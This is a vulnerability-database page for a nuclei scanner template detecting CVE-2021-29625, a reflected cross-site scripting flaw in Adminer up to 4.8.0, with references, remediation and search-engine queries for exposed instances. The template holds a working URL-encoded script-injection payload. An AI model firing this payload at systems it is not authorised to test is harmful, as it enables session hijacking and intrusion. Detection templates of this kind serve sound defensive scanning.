Lucene search
+L

Adminer <=4.8.0 - Cross-Site Scripting

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 111 Views

Adminer 4.6.1 to 4.8.0 has a cross-site scripting vulnerability allowing injection of malicious scripts, potentially leading to session hijacking, defacement, or theft of sensitive information

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-29625
19 May 202122:15
attackerkb
bdu_fstec
BDU FSTEC
The vulnerability of the Adminer database management software lies in the lack of measures to sanitize input data, allowing attackers to execute cross-site scripting (XSS) attacks.
9 Jun 202100:00
bdu_fstec
circl
Circl
CVE-2021-29625
27 Apr 202309:58
circl
cnnvd
CNNVD
SOURCEFORGE Adminer 跨站脚本漏洞
19 May 202100:00
cnnvd
cnvd
CNVD
Unspecified Vulnerability in SOURCEFORGE Adminer
21 May 202100:00
cnvd
cve
CVE
CVE-2021-29625
19 May 202121:35
cve
cvelist
Cvelist
CVE-2021-29625 XSS in doc_link
19 May 202121:35
cvelist
debiancve
Debian CVE
CVE-2021-29625
19 May 202121:35
debiancve
github
Github Security Blog
XSS in doc_link
18 Mar 202217:49
github
nvd
NVD
CVE-2021-29625
19 May 202122:15
nvd
Rows per page
id: CVE-2021-29625

info:
  name: Adminer <=4.8.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the Adminer interface, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: This vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
  reference:
    - https://sourceforge.net/p/adminer/bugs-and-features/797/
    - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29625
    - https://github.com/vrana/adminer/security/advisories/GHSA-2v82-5746-vwqc
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-29625
    cwe-id: CWE-79
    epss-score: 0.08723
    epss-percentile: 0.94603
    cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adminer
    product: adminer
    shodan-query:
      - http.title:"login - adminer"
      - cpe:"cpe:2.3:a:adminer:adminer"
    fofa-query:
      - app="adminer" && body="4.7.8"
      - title="login - adminer"
    google-query: intitle:"login - adminer"
    hunter-query: app.name="adminer"&&web.body="4.7.8"
  tags: cve2021,cve,adminer,xss,sqli,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fee7788d56cd785c29fb85b4e1455d89de3b292232a011baba7e87952a4c9a00022100a2450698b318423fc14d5f384bfbb1839c3634d64b30871e215e7c5239470be4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
CVSS 3.16.1 - 7.5
EPSS0.08723
111